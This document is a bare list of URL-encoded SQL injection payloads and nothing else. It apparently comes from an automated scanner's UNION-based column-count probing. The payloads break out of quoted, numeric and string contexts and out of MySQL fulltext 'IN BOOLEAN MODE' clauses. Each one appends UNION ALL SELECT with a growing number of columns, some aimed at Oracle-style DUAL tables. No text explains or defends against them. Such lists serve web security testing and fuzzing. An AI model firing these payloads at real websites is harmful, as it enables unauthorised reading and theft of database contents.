-4216%22%20WHERE%207522%3D7522%20UNION%20ALL%20SELECT%207522%2C%207522%2C%207522%2C%207522%2C%207522%2C%207522%2C%207522%2C%207522%2C%207522%2C%207522%2C%207522%2C%207522%2C%207522%2C%207522%2C%207522%2C%207522%2C%207522%2C%207522%2C%207522%2C%207522%2C%207522%2C%207522%2C%207522%2C%207522%2C%207522%2C%207522%2C%207522%2C%207522%2C%207522%2C%207522%23 -2304%27%20%7C%7C%20%28SELECT%209634%20FROM%20DUAL%20WHERE%204606%3D4606%20UNION%20ALL%20SELECT%204606%2C%204606%2C%204606%2C%204606%2C%204606%2C%204606%2C%204606%2C%204606%2C%204606%2C%204606%2C%204606%2C%204606%2C%204606%2C%204606%2C%204606%2C%204606%2C%204606%2C%204606%2C%204606%2C%204606%2C%204606%23%20%29%20%7C%7C%20%27 -7786%27%20%7C%7C%20%28SELECT%206636%20FROM%20DUAL%20WHERE%207995%3D7995%20UNION%20ALL%20SELECT%207995%2C%207995%2C%207995%2C%207995%2C%207995%2C%207995%2C%207995%2C%207995%2C%207995%2C%207995%2C%207995%2C%207995%2C%207995%2C%207995%2C%207995%2C%207995%2C%207995%2C%207995%2C%207995%2C%207995%2C%207995%2C%207995%23%20%29%20%7C%7C%20%27 -3196%27%20%7C%7C%20%28SELECT%202264%20FROM%20DUAL%20WHERE%204137%3D4137%20UNION%20ALL%20SELECT%204137%2C%204137%2C%204137%2C%204137%2C%204137%2C%204137%2C%204137%2C%204137%2C%204137%2C%204137%2C%204137%2C%204137%2C%204137%2C%204137%2C%204137%2C%204137%2C%204137%2C%204137%2C%204137%2C%204137%2C%204137%2C%204137%2C%204137%23%20%29%20%7C%7C%20%27 -5934%27%20%7C%7C%20%28SELECT%205745%20FROM%20DUAL%20WHERE%201463%3D1463%20UNION%20ALL%20SELECT%201463%2C%201463%2C%201463%2C%201463%2C%201463%2C%201463%2C%201463%2C%201463%2C%201463%2C%201463%2C%201463%2C%201463%2C%201463%2C%201463%2C%201463%2C%201463%2C%201463%2C%201463%2C%201463%2C%201463%2C%201463%2C%201463%2C%201463%2C%201463%23%20%29%20%7C%7C%20%27 -2987%27%20%7C%7C%20%28SELECT%204774%20FROM%20DUAL%20WHERE%207722%3D7722%20UNION%20ALL%20SELECT%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%2C%207722%23%20%29%20%7C%7C%20%27 -9947%27%20%7C%7C%20%28SELECT%202420%20FROM%20DUAL%20WHERE%208025%3D8025%20UNION%20ALL%20SELECT%208025%2C%208025%2C%208025%2C%208025%2C%208025%2C%208025%2C%208025%2C%208025%2C%208025%2C%208025%2C%208025%2C%208025%2C%208025%2C%208025%2C%208025%2C%208025%2C%208025%2C%208025%2C%208025%2C%208025%2C%208025%2C%208025%2C%208025%2C%208025%2C%208025%2C%208025%23%20%29%20%7C%7C%20%27 -1070%27%20%7C%7C%20%28SELECT%209235%20FROM%20DUAL%20WHERE%202809%3D2809%20UNION%20ALL%20SELECT%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%23%20%29%20%7C%7C%20%27 -1687%27%20%7C%7C%20%28SELECT%201288%20FROM%20DUAL%20WHERE%203678%3D3678%20UNION%20ALL%20SELECT%203678%2C%203678%2C%203678%2C%203678%2C%203678%2C%203678%2C%203678%2C%203678%2C%203678%2C%203678%2C%203678%2C%203678%2C%203678%2C%203678%2C%203678%2C%203678%2C%203678%2C%203678%2C%203678%2C%203678%2C%203678%2C%203678%2C%203678%2C%203678%2C%203678%2C%203678%2C%203678%2C%203678%23%20%29%20%7C%7C%20%27 -6588%27%20%7C%7C%20%28SELECT%201029%20FROM%20DUAL%20WHERE%204657%3D4657%20UNION%20ALL%20SELECT%204657%2C%204657%2C%204657%2C%204657%2C%204657%2C%204657%2C%204657%2C%204657%2C%204657%2C%204657%2C%204657%2C%204657%2C%204657%2C%204657%2C%204657%2C%204657%2C%204657%2C%204657%2C%204657%2C%204657%2C%204657%2C%204657%2C%204657%2C%204657%2C%204657%2C%204657%2C%204657%2C%204657%2C%204657%23%20%29%20%7C%7C%20%27 -6760%27%20%7C%7C%20%28SELECT%209648%20FROM%20DUAL%20WHERE%202453%3D2453%20UNION%20ALL%20SELECT%202453%2C%202453%2C%202453%2C%202453%2C%202453%2C%202453%2C%202453%2C%202453%2C%202453%2C%202453%2C%202453%2C%202453%2C%202453%2C%202453%2C%202453%2C%202453%2C%202453%2C%202453%2C%202453%2C%202453%2C%202453%2C%202453%2C%202453%2C%202453%2C%202453%2C%202453%2C%202453%2C%202453%2C%202453%2C%202453%23%20%29%20%7C%7C%20%27 -4255%27%20%7C%7C%20%28SELECT%201089%20WHERE%204951%3D4951%20UNION%20ALL%20SELECT%204951%2C%204951%2C%204951%2C%204951%2C%204951%2C%204951%2C%204951%2C%204951%2C%204951%2C%204951%2C%204951%2C%204951%2C%204951%2C%204951%2C%204951%2C%204951%2C%204951%2C%204951%2C%204951%2C%204951%2C%204951%23%20%29%20%7C%7C%20%27 -3961%27%20%7C%7C%20%28SELECT%201112%20WHERE%208864%3D8864%20UNION%20ALL%20SELECT%208864%2C%208864%2C%208864%2C%208864%2C%208864%2C%208864%2C%208864%2C%208864%2C%208864%2C%208864%2C%208864%2C%208864%2C%208864%2C%208864%2C%208864%2C%208864%2C%208864%2C%208864%2C%208864%2C%208864%2C%208864%2C%208864%23%20%29%20%7C%7C%20%27 -1268%27%20%7C%7C%20%28SELECT%207371%20WHERE%205575%3D5575%20UNION%20ALL%20SELECT%205575%2C%205575%2C%205575%2C%205575%2C%205575%2C%205575%2C%205575%2C%205575%2C%205575%2C%205575%2C%205575%2C%205575%2C%205575%2C%205575%2C%205575%2C%205575%2C%205575%2C%205575%2C%205575%2C%205575%2C%205575%2C%205575%2C%205575%23%20%29%20%7C%7C%20%27 -9346%27%20%7C%7C%20%28SELECT%201072%20WHERE%205516%3D5516%20UNION%20ALL%20SELECT%205516%2C%205516%2C%205516%2C%205516%2C%205516%2C%205516%2C%205516%2C%205516%2C%205516%2C%205516%2C%205516%2C%205516%2C%205516%2C%205516%2C%205516%2C%205516%2C%205516%2C%205516%2C%205516%2C%205516%2C%205516%2C%205516%2C%205516%2C%205516%23%20%29%20%7C%7C%20%27 -8632%27%20%7C%7C%20%28SELECT%207286%20WHERE%201628%3D1628%20UNION%20ALL%20SELECT%201628%2C%201628%2C%201628%2C%201628%2C%201628%2C%201628%2C%201628%2C%201628%2C%201628%2C%201628%2C%201628%2C%201628%2C%201628%2C%201628%2C%201628%2C%201628%2C%201628%2C%201628%2C%201628%2C%201628%2C%201628%2C%201628%2C%201628%2C%201628%2C%201628%23%20%29%20%7C%7C%20%27 -5240%27%20%7C%7C%20%28SELECT%204456%20WHERE%202568%3D2568%20UNION%20ALL%20SELECT%202568%2C%202568%2C%202568%2C%202568%2C%202568%2C%202568%2C%202568%2C%202568%2C%202568%2C%202568%2C%202568%2C%202568%2C%202568%2C%202568%2C%202568%2C%202568%2C%202568%2C%202568%2C%202568%2C%202568%2C%202568%2C%202568%2C%202568%2C%202568%2C%202568%2C%202568%23%20%29%20%7C%7C%20%27 -3683%27%20%7C%7C%20%28SELECT%202235%20WHERE%206195%3D6195%20UNION%20ALL%20SELECT%206195%2C%206195%2C%206195%2C%206195%2C%206195%2C%206195%2C%206195%2C%206195%2C%206195%2C%206195%2C%206195%2C%206195%2C%206195%2C%206195%2C%206195%2C%206195%2C%206195%2C%206195%2C%206195%2C%206195%2C%206195%2C%206195%2C%206195%2C%206195%2C%206195%2C%206195%2C%206195%23%20%29%20%7C%7C%20%27 -2846%27%20%7C%7C%20%28SELECT%208829%20WHERE%202166%3D2166%20UNION%20ALL%20SELECT%202166%2C%202166%2C%202166%2C%202166%2C%202166%2C%202166%2C%202166%2C%202166%2C%202166%2C%202166%2C%202166%2C%202166%2C%202166%2C%202166%2C%202166%2C%202166%2C%202166%2C%202166%2C%202166%2C%202166%2C%202166%2C%202166%2C%202166%2C%202166%2C%202166%2C%202166%2C%202166%2C%202166%23%20%29%20%7C%7C%20%27 -6396%27%20%7C%7C%20%28SELECT%207599%20WHERE%206299%3D6299%20UNION%20ALL%20SELECT%206299%2C%206299%2C%206299%2C%206299%2C%206299%2C%206299%2C%206299%2C%206299%2C%206299%2C%206299%2C%206299%2C%206299%2C%206299%2C%206299%2C%206299%2C%206299%2C%206299%2C%206299%2C%206299%2C%206299%2C%206299%2C%206299%2C%206299%2C%206299%2C%206299%2C%206299%2C%206299%2C%206299%2C%206299%23%20%29%20%7C%7C%20%27 -2446%27%20%7C%7C%20%28SELECT%207413%20WHERE%209930%3D9930%20UNION%20ALL%20SELECT%209930%2C%209930%2C%209930%2C%209930%2C%209930%2C%209930%2C%209930%2C%209930%2C%209930%2C%209930%2C%209930%2C%209930%2C%209930%2C%209930%2C%209930%2C%209930%2C%209930%2C%209930%2C%209930%2C%209930%2C%209930%2C%209930%2C%209930%2C%209930%2C%209930%2C%209930%2C%209930%2C%209930%2C%209930%2C%209930%23%20%29%20%7C%7C%20%27 -2146%20%2B%20%28SELECT%201503%20FROM%20DUAL%20WHERE%203809%3D3809%20UNION%20ALL%20SELECT%203809%2C%203809%2C%203809%2C%203809%2C%203809%2C%203809%2C%203809%2C%203809%2C%203809%2C%203809%2C%203809%2C%203809%2C%203809%2C%203809%2C%203809%2C%203809%2C%203809%2C%203809%2C%203809%2C%203809%2C%203809%23%20%29 -9722%20%2B%20%28SELECT%205518%20FROM%20DUAL%20WHERE%207830%3D7830%20UNION%20ALL%20SELECT%207830%2C%207830%2C%207830%2C%207830%2C%207830%2C%207830%2C%207830%2C%207830%2C%207830%2C%207830%2C%207830%2C%207830%2C%207830%2C%207830%2C%207830%2C%207830%2C%207830%2C%207830%2C%207830%2C%207830%2C%207830%2C%207830%23%20%29 -6190%20%2B%20%28SELECT%202715%20FROM%20DUAL%20WHERE%204280%3D4280%20UNION%20ALL%20SELECT%204280%2C%204280%2C%204280%2C%204280%2C%204280%2C%204280%2C%204280%2C%204280%2C%204280%2C%204280%2C%204280%2C%204280%2C%204280%2C%204280%2C%204280%2C%204280%2C%204280%2C%204280%2C%204280%2C%204280%2C%204280%2C%204280%2C%204280%23%20%29 -5963%20%2B%20%28SELECT%208514%20FROM%20DUAL%20WHERE%202090%3D2090%20UNION%20ALL%20SELECT%202090%2C%202090%2C%202090%2C%202090%2C%202090%2C%202090%2C%202090%2C%202090%2C%202090%2C%202090%2C%202090%2C%202090%2C%202090%2C%202090%2C%202090%2C%202090%2C%202090%2C%202090%2C%202090%2C%202090%2C%202090%2C%202090%2C%202090%2C%202090%23%20%29 -5058%20%2B%20%28SELECT%203955%20FROM%20DUAL%20WHERE%201958%3D1958%20UNION%20ALL%20SELECT%201958%2C%201958%2C%201958%2C%201958%2C%201958%2C%201958%2C%201958%2C%201958%2C%201958%2C%201958%2C%201958%2C%201958%2C%201958%2C%201958%2C%201958%2C%201958%2C%201958%2C%201958%2C%201958%2C%201958%2C%201958%2C%201958%2C%201958%2C%201958%2C%201958%23%20%29 -9337%20%2B%20%28SELECT%203274%20FROM%20DUAL%20WHERE%206790%3D6790%20UNION%20ALL%20SELECT%206790%2C%206790%2C%206790%2C%206790%2C%206790%2C%206790%2C%206790%2C%206790%2C%206790%2C%206790%2C%206790%2C%206790%2C%206790%2C%206790%2C%206790%2C%206790%2C%206790%2C%206790%2C%206790%2C%206790%2C%206790%2C%206790%2C%206790%2C%206790%2C%206790%2C%206790%23%20%29 -8895%20%2B%20%28SELECT%205135%20FROM%20DUAL%20WHERE%206825%3D6825%20UNION%20ALL%20SELECT%206825%2C%206825%2C%206825%2C%206825%2C%206825%2C%206825%2C%206825%2C%206825%2C%206825%2C%206825%2C%206825%2C%206825%2C%206825%2C%206825%2C%206825%2C%206825%2C%206825%2C%206825%2C%206825%2C%206825%2C%206825%2C%206825%2C%206825%2C%206825%2C%206825%2C%206825%2C%206825%23%20%29 -3268%20%2B%20%28SELECT%209078%20FROM%20DUAL%20WHERE%209657%3D9657%20UNION%20ALL%20SELECT%209657%2C%209657%2C%209657%2C%209657%2C%209657%2C%209657%2C%209657%2C%209657%2C%209657%2C%209657%2C%209657%2C%209657%2C%209657%2C%209657%2C%209657%2C%209657%2C%209657%2C%209657%2C%209657%2C%209657%2C%209657%2C%209657%2C%209657%2C%209657%2C%209657%2C%209657%2C%209657%2C%209657%23%20%29 -6299%20%2B%20%28SELECT%202723%20FROM%20DUAL%20WHERE%207582%3D7582%20UNION%20ALL%20SELECT%207582%2C%207582%2C%207582%2C%207582%2C%207582%2C%207582%2C%207582%2C%207582%2C%207582%2C%207582%2C%207582%2C%207582%2C%207582%2C%207582%2C%207582%2C%207582%2C%207582%2C%207582%2C%207582%2C%207582%2C%207582%2C%207582%2C%207582%2C%207582%2C%207582%2C%207582%2C%207582%2C%207582%2C%207582%23%20%29 -5136%20%2B%20%28SELECT%208396%20FROM%20DUAL%20WHERE%202105%3D2105%20UNION%20ALL%20SELECT%202105%2C%202105%2C%202105%2C%202105%2C%202105%2C%202105%2C%202105%2C%202105%2C%202105%2C%202105%2C%202105%2C%202105%2C%202105%2C%202105%2C%202105%2C%202105%2C%202105%2C%202105%2C%202105%2C%202105%2C%202105%2C%202105%2C%202105%2C%202105%2C%202105%2C%202105%2C%202105%2C%202105%2C%202105%2C%202105%23%20%29 -5645%20%2B%20%28SELECT%208585%20WHERE%208738%3D8738%20UNION%20ALL%20SELECT%208738%2C%208738%2C%208738%2C%208738%2C%208738%2C%208738%2C%208738%2C%208738%2C%208738%2C%208738%2C%208738%2C%208738%2C%208738%2C%208738%2C%208738%2C%208738%2C%208738%2C%208738%2C%208738%2C%208738%2C%208738%23%20%29 -4572%20%2B%20%28SELECT%209374%20WHERE%209294%3D9294%20UNION%20ALL%20SELECT%209294%2C%209294%2C%209294%2C%209294%2C%209294%2C%209294%2C%209294%2C%209294%2C%209294%2C%209294%2C%209294%2C%209294%2C%209294%2C%209294%2C%209294%2C%209294%2C%209294%2C%209294%2C%209294%2C%209294%2C%209294%2C%209294%23%20%29 -3502%20%2B%20%28SELECT%201297%20WHERE%204603%3D4603%20UNION%20ALL%20SELECT%204603%2C%204603%2C%204603%2C%204603%2C%204603%2C%204603%2C%204603%2C%204603%2C%204603%2C%204603%2C%204603%2C%204603%2C%204603%2C%204603%2C%204603%2C%204603%2C%204603%2C%204603%2C%204603%2C%204603%2C%204603%2C%204603%2C%204603%23%20%29 -7344%20%2B%20%28SELECT%208031%20WHERE%202399%3D2399%20UNION%20ALL%20SELECT%202399%2C%202399%2C%202399%2C%202399%2C%202399%2C%202399%2C%202399%2C%202399%2C%202399%2C%202399%2C%202399%2C%202399%2C%202399%2C%202399%2C%202399%2C%202399%2C%202399%2C%202399%2C%202399%2C%202399%2C%202399%2C%202399%2C%202399%2C%202399%23%20%29 -2242%20%2B%20%28SELECT%209929%20WHERE%207508%3D7508%20UNION%20ALL%20SELECT%207508%2C%207508%2C%207508%2C%207508%2C%207508%2C%207508%2C%207508%2C%207508%2C%207508%2C%207508%2C%207508%2C%207508%2C%207508%2C%207508%2C%207508%2C%207508%2C%207508%2C%207508%2C%207508%2C%207508%2C%207508%2C%207508%2C%207508%2C%207508%2C%207508%23%20%29 -2806%20%2B%20%28SELECT%209667%20WHERE%204352%3D4352%20UNION%20ALL%20SELECT%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%2C%204352%23%20%29 -3193%20%2B%20%28SELECT%205508%20WHERE%202116%3D2116%20UNION%20ALL%20SELECT%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%23%20%29 -1611%20%2B%20%28SELECT%201127%20WHERE%204500%3D4500%20UNION%20ALL%20SELECT%204500%2C%204500%2C%204500%2C%204500%2C%204500%2C%204500%2C%204500%2C%204500%2C%204500%2C%204500%2C%204500%2C%204500%2C%204500%2C%204500%2C%204500%2C%204500%2C%204500%2C%204500%2C%204500%2C%204500%2C%204500%2C%204500%2C%204500%2C%204500%2C%204500%2C%204500%2C%204500%2C%204500%23%20%29 -1302%20%2B%20%28SELECT%202840%20WHERE%208810%3D8810%20UNION%20ALL%20SELECT%208810%2C%208810%2C%208810%2C%208810%2C%208810%2C%208810%2C%208810%2C%208810%2C%208810%2C%208810%2C%208810%2C%208810%2C%208810%2C%208810%2C%208810%2C%208810%2C%208810%2C%208810%2C%208810%2C%208810%2C%208810%2C%208810%2C%208810%2C%208810%2C%208810%2C%208810%2C%208810%2C%208810%2C%208810%23%20%29 -9235%20%2B%20%28SELECT%207943%20WHERE%201070%3D1070%20UNION%20ALL%20SELECT%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%23%20%29 -1723%27%20%2B%20%28SELECT%20%27diEQ%27%20FROM%20DUAL%20WHERE%208709%3D8709%20UNION%20ALL%20SELECT%208709%2C%208709%2C%208709%2C%208709%2C%208709%2C%208709%2C%208709%2C%208709%2C%208709%2C%208709%2C%208709%2C%208709%2C%208709%2C%208709%2C%208709%2C%208709%2C%208709%2C%208709%2C%208709%2C%208709%2C%208709%23%20%29%20%2B%20%27 -2309%27%20%2B%20%28SELECT%20%27bdvs%27%20FROM%20DUAL%20WHERE%203241%3D3241%20UNION%20ALL%20SELECT%203241%2C%203241%2C%203241%2C%203241%2C%203241%2C%203241%2C%203241%2C%203241%2C%203241%2C%203241%2C%203241%2C%203241%2C%203241%2C%203241%2C%203241%2C%203241%2C%203241%2C%203241%2C%203241%2C%203241%2C%203241%2C%203241%23%20%29%20%2B%20%27 -8256%27%20%2B%20%28SELECT%20%27qLSe%27%20FROM%20DUAL%20WHERE%203471%3D3471%20UNION%20ALL%20SELECT%203471%2C%203471%2C%203471%2C%203471%2C%203471%2C%203471%2C%203471%2C%203471%2C%203471%2C%203471%2C%203471%2C%203471%2C%203471%2C%203471%2C%203471%2C%203471%2C%203471%2C%203471%2C%203471%2C%203471%2C%203471%2C%203471%2C%203471%23%20%29%20%2B%20%27 -9074%27%20%2B%20%28SELECT%20%27lrJn%27%20FROM%20DUAL%20WHERE%203424%3D3424%20UNION%20ALL%20SELECT%203424%2C%203424%2C%203424%2C%203424%2C%203424%2C%203424%2C%203424%2C%203424%2C%203424%2C%203424%2C%203424%2C%203424%2C%203424%2C%203424%2C%203424%2C%203424%2C%203424%2C%203424%2C%203424%2C%203424%2C%203424%2C%203424%2C%203424%2C%203424%23%20%29%20%2B%20%27 -2594%27%20%2B%20%28SELECT%20%27AgeZ%27%20FROM%20DUAL%20WHERE%205760%3D5760%20UNION%20ALL%20SELECT%205760%2C%205760%2C%205760%2C%205760%2C%205760%2C%205760%2C%205760%2C%205760%2C%205760%2C%205760%2C%205760%2C%205760%2C%205760%2C%205760%2C%205760%2C%205760%2C%205760%2C%205760%2C%205760%2C%205760%2C%205760%2C%205760%2C%205760%2C%205760%2C%205760%23%20%29%20%2B%20%27 -1329%27%20%2B%20%28SELECT%20%27FLZs%27%20FROM%20DUAL%20WHERE%205236%3D5236%20UNION%20ALL%20SELECT%205236%2C%205236%2C%205236%2C%205236%2C%205236%2C%205236%2C%205236%2C%205236%2C%205236%2C%205236%2C%205236%2C%205236%2C%205236%2C%205236%2C%205236%2C%205236%2C%205236%2C%205236%2C%205236%2C%205236%2C%205236%2C%205236%2C%205236%2C%205236%2C%205236%2C%205236%23%20%29%20%2B%20%27 -2388%27%20%2B%20%28SELECT%20%27Gyrf%27%20FROM%20DUAL%20WHERE%206399%3D6399%20UNION%20ALL%20SELECT%206399%2C%206399%2C%206399%2C%206399%2C%206399%2C%206399%2C%206399%2C%206399%2C%206399%2C%206399%2C%206399%2C%206399%2C%206399%2C%206399%2C%206399%2C%206399%2C%206399%2C%206399%2C%206399%2C%206399%2C%206399%2C%206399%2C%206399%2C%206399%2C%206399%2C%206399%2C%206399%23%20%29%20%2B%20%27 -7848%27%20%2B%20%28SELECT%20%27qGYL%27%20FROM%20DUAL%20WHERE%206906%3D6906%20UNION%20ALL%20SELECT%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%23%20%29%20%2B%20%27 -2684%27%20%2B%20%28SELECT%20%27HZqz%27%20FROM%20DUAL%20WHERE%207973%3D7973%20UNION%20ALL%20SELECT%207973%2C%207973%2C%207973%2C%207973%2C%207973%2C%207973%2C%207973%2C%207973%2C%207973%2C%207973%2C%207973%2C%207973%2C%207973%2C%207973%2C%207973%2C%207973%2C%207973%2C%207973%2C%207973%2C%207973%2C%207973%2C%207973%2C%207973%2C%207973%2C%207973%2C%207973%2C%207973%2C%207973%2C%207973%23%20%29%20%2B%20%27 -9194%27%20%2B%20%28SELECT%20%27jGjA%27%20FROM%20DUAL%20WHERE%207419%3D7419%20UNION%20ALL%20SELECT%207419%2C%207419%2C%207419%2C%207419%2C%207419%2C%207419%2C%207419%2C%207419%2C%207419%2C%207419%2C%207419%2C%207419%2C%207419%2C%207419%2C%207419%2C%207419%2C%207419%2C%207419%2C%207419%2C%207419%2C%207419%2C%207419%2C%207419%2C%207419%2C%207419%2C%207419%2C%207419%2C%207419%2C%207419%2C%207419%23%20%29%20%2B%20%27 -9281%27%20%2B%20%28SELECT%20%27zSCt%27%20WHERE%203755%3D3755%20UNION%20ALL%20SELECT%203755%2C%203755%2C%203755%2C%203755%2C%203755%2C%203755%2C%203755%2C%203755%2C%203755%2C%203755%2C%203755%2C%203755%2C%203755%2C%203755%2C%203755%2C%203755%2C%203755%2C%203755%2C%203755%2C%203755%2C%203755%23%20%29%20%2B%20%27 -2063%27%20%2B%20%28SELECT%20%27RGgR%27%20WHERE%202644%3D2644%20UNION%20ALL%20SELECT%202644%2C%202644%2C%202644%2C%202644%2C%202644%2C%202644%2C%202644%2C%202644%2C%202644%2C%202644%2C%202644%2C%202644%2C%202644%2C%202644%2C%202644%2C%202644%2C%202644%2C%202644%2C%202644%2C%202644%2C%202644%2C%202644%23%20%29%20%2B%20%27 -5380%27%20%2B%20%28SELECT%20%27AUjX%27%20WHERE%209141%3D9141%20UNION%20ALL%20SELECT%209141%2C%209141%2C%209141%2C%209141%2C%209141%2C%209141%2C%209141%2C%209141%2C%209141%2C%209141%2C%209141%2C%209141%2C%209141%2C%209141%2C%209141%2C%209141%2C%209141%2C%209141%2C%209141%2C%209141%2C%209141%2C%209141%2C%209141%23%20%29%20%2B%20%27 -9300%27%20%2B%20%28SELECT%20%27kbEB%27%20WHERE%209756%3D9756%20UNION%20ALL%20SELECT%209756%2C%209756%2C%209756%2C%209756%2C%209756%2C%209756%2C%209756%2C%209756%2C%209756%2C%209756%2C%209756%2C%209756%2C%209756%2C%209756%2C%209756%2C%209756%2C%209756%2C%209756%2C%209756%2C%209756%2C%209756%2C%209756%2C%209756%2C%209756%23%20%29%20%2B%20%27 -1224%27%20%2B%20%28SELECT%20%27JoyN%27%20WHERE%205160%3D5160%20UNION%20ALL%20SELECT%205160%2C%205160%2C%205160%2C%205160%2C%205160%2C%205160%2C%205160%2C%205160%2C%205160%2C%205160%2C%205160%2C%205160%2C%205160%2C%205160%2C%205160%2C%205160%2C%205160%2C%205160%2C%205160%2C%205160%2C%205160%2C%205160%2C%205160%2C%205160%2C%205160%23%20%29%20%2B%20%27 -2219%27%20%2B%20%28SELECT%20%27bGvh%27%20WHERE%206792%3D6792%20UNION%20ALL%20SELECT%206792%2C%206792%2C%206792%2C%206792%2C%206792%2C%206792%2C%206792%2C%206792%2C%206792%2C%206792%2C%206792%2C%206792%2C%206792%2C%206792%2C%206792%2C%206792%2C%206792%2C%206792%2C%206792%2C%206792%2C%206792%2C%206792%2C%206792%2C%206792%2C%206792%2C%206792%23%20%29%20%2B%20%27 -2352%27%20%2B%20%28SELECT%20%27hhyQ%27%20WHERE%201663%3D1663%20UNION%20ALL%20SELECT%201663%2C%201663%2C%201663%2C%201663%2C%201663%2C%201663%2C%201663%2C%201663%2C%201663%2C%201663%2C%201663%2C%201663%2C%201663%2C%201663%2C%201663%2C%201663%2C%201663%2C%201663%2C%201663%2C%201663%2C%201663%2C%201663%2C%201663%2C%201663%2C%201663%2C%201663%2C%201663%23%20%29%20%2B%20%27 -1049%27%20%2B%20%28SELECT%20%27cgYQ%27%20WHERE%205851%3D5851%20UNION%20ALL%20SELECT%205851%2C%205851%2C%205851%2C%205851%2C%205851%2C%205851%2C%205851%2C%205851%2C%205851%2C%205851%2C%205851%2C%205851%2C%205851%2C%205851%2C%205851%2C%205851%2C%205851%2C%205851%2C%205851%2C%205851%2C%205851%2C%205851%2C%205851%2C%205851%2C%205851%2C%205851%2C%205851%2C%205851%23%20%29%20%2B%20%27 -4251%27%20%2B%20%28SELECT%20%27OTaJ%27%20WHERE%209439%3D9439%20UNION%20ALL%20SELECT%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%23%20%29%20%2B%20%27 -7677%27%20%2B%20%28SELECT%20%27zKbW%27%20WHERE%201071%3D1071%20UNION%20ALL%20SELECT%201071%2C%201071%2C%201071%2C%201071%2C%201071%2C%201071%2C%201071%2C%201071%2C%201071%2C%201071%2C%201071%2C%201071%2C%201071%2C%201071%2C%201071%2C%201071%2C%201071%2C%201071%2C%201071%2C%201071%2C%201071%2C%201071%2C%201071%2C%201071%2C%201071%2C%201071%2C%201071%2C%201071%2C%201071%2C%201071%23%20%29%20%2B%20%27 -6915%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%201543%2C%201543%2C%201543%2C%201543%2C%201543%2C%201543%2C%201543%2C%201543%2C%201543%2C%201543%2C%201543%2C%201543%2C%201543%2C%201543%2C%201543%2C%201543%2C%201543%2C%201543%2C%201543%2C%201543%2C%201543%23%20%23 -7330%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%205277%2C%205277%2C%205277%2C%205277%2C%205277%2C%205277%2C%205277%2C%205277%2C%205277%2C%205277%2C%205277%2C%205277%2C%205277%2C%205277%2C%205277%2C%205277%2C%205277%2C%205277%2C%205277%2C%205277%2C%205277%2C%205277%23%20%23 -7893%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%2C%202285%23%20%23 -7458%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%205746%2C%205746%2C%205746%2C%205746%2C%205746%2C%205746%2C%205746%2C%205746%2C%205746%2C%205746%2C%205746%2C%205746%2C%205746%2C%205746%2C%205746%2C%205746%2C%205746%2C%205746%2C%205746%2C%205746%2C%205746%2C%205746%2C%205746%2C%205746%23%20%23 -2448%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206769%2C%206769%2C%206769%2C%206769%2C%206769%2C%206769%2C%206769%2C%206769%2C%206769%2C%206769%2C%206769%2C%206769%2C%206769%2C%206769%2C%206769%2C%206769%2C%206769%2C%206769%2C%206769%2C%206769%2C%206769%2C%206769%2C%206769%2C%206769%2C%206769%23%20%23 -6926%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%204421%2C%204421%2C%204421%2C%204421%2C%204421%2C%204421%2C%204421%2C%204421%2C%204421%2C%204421%2C%204421%2C%204421%2C%204421%2C%204421%2C%204421%2C%204421%2C%204421%2C%204421%2C%204421%2C%204421%2C%204421%2C%204421%2C%204421%2C%204421%2C%204421%2C%204421%23%20%23 -3175%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%204188%2C%204188%2C%204188%2C%204188%2C%204188%2C%204188%2C%204188%2C%204188%2C%204188%2C%204188%2C%204188%2C%204188%2C%204188%2C%204188%2C%204188%2C%204188%2C%204188%2C%204188%2C%204188%2C%204188%2C%204188%2C%204188%2C%204188%2C%204188%2C%204188%2C%204188%2C%204188%23%20%23 